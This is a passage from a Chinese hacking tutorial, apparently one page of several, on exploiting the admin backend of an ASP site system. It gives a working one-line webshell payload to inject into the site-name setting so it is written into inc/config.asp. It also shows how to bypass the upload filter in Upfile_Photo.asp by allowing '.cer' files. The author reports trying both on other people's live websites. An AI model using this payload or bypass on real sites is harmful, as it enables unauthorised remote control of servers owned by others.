|
·后台的利用
(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%',再点保存配置,如图15:
(图15)
然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,图16:
(图16)
这时再打开一句话马的客户端,提交同样得到一个小马.图17:
(图17)
(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码如下:
以下是代码片段:
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
EnableUpload=false
end if
if EnableUpload=false then
msg="这种文件类型不允许上传!\n\n只允许上传这几种文件类型:" & UpFileType
FoundErr=true
end if |
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传”cer”等被服务器可解析的文件类型就可,由于我下载的是测试版本,无法在自己机子上测试,不过登陆了使用这系统的另一网站后台后,成功上传了”cer”后缀的文件后,如图18,图19:
(图18)
(图19)
提交时却显示下载页面,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)
上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] 下一页 |
